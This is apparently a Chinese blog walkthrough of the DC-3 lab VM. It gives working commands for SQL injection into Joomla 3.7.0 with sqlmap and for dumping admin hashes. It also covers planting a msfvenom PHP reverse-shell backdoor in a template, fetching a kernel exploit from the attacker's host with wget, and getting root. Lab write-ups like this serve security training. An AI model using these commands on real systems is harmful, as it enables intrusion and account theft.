DC3详解

DC-3靶机

1.确定靶机IP

arp-scan -l

masscan --rate=10000 -p 1-65535 192.168.220.133

nmap -p80 -sV -A -T4 192.168.220.133

2.收集信息

根据nmap的扫描结果可以发现其CMS为joomla,采用joomla扫描器joomscan进行扫描

joomscan -u http://192.168.220.133

发现登录页面http://192.168.220.133/administrator/

发现joomla版本为3.7.0

查找相关漏洞

 searchsploit joomla 3.7.0

查找joomla 3.7.0存在的漏洞

 查看漏洞利用文章

searchsploit -p 42033.txt

 将txt文件复制到dc3目录(当前目录)下

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt ./

3.sqlmap利用

提示用sqlmap进行遍历数据库

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

将其中的localhost改为靶机的IP 192.168.220.133

sqlmap -u "http://192.168.220.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

 读取到五个数据库,注意到有一个joomla的数据库

采用sqlmap来遍历数据库joomladb中的表名,发现#__users表,遍历其中的内容

sqlmap -u "http://192.168.220.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

 sqlmap -u "http://192.168.220.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns

发现username和password两个列名

 查看其中的内容

sqlmap -u "http://192.168.220.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C "username,password" --dump

发现admin账户和其密码的hash值

 创建一个txt文件,将admin密码的hash值放入其中

touch 1.txt

vi 1.txt

采用john来解密hash值,得到密码为snoopy

登录admin账户密码snoopy

 在模板中发现能够上传文件,尝试上传木马文件连接靶机

 4.文件上传

创建一个php木马上传

msfvenom -p php/meterpreter/reverse_tcp lhost-192.168.220.133 lport=4444 -f raw -o hack.php

生成一个php后门文件,将生成的后门文件放入网页templates(模板)中创建一个php文件

 

 

 后门创建好后,打开msf进行木马利用

 use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 192.168.220.133

 exploit  //利用

 网站访问木马文件

192.168.220.133/templates/beez3/hack.php

 返回kali查看,此时已经获取到权限

 建立一个交互式shell

先输入shell

再输入python语法,建立交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

 searchsploit Ubuntu

searchsploit -p 39772.txt

然后建立网站目录

python -m SimpleHTTPServer 8888

PS:查看自身端口开放情况

wget http://192.168.220.129:8888/39772.zip

 unzip 39772.zip

 tar xf exploit.tar

进入39772文件夹下,然后打开exploit.tar文件

cd ebpf_mapfd_doubleput_exploit

进入ebpf_mapfd_doubleput_exploit目录下

./compile.sh

执行程序

 ./doubleput

执行程序doubleput

得到root权限,查看家目录,拿到最终的flag。

谢谢观看 !

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值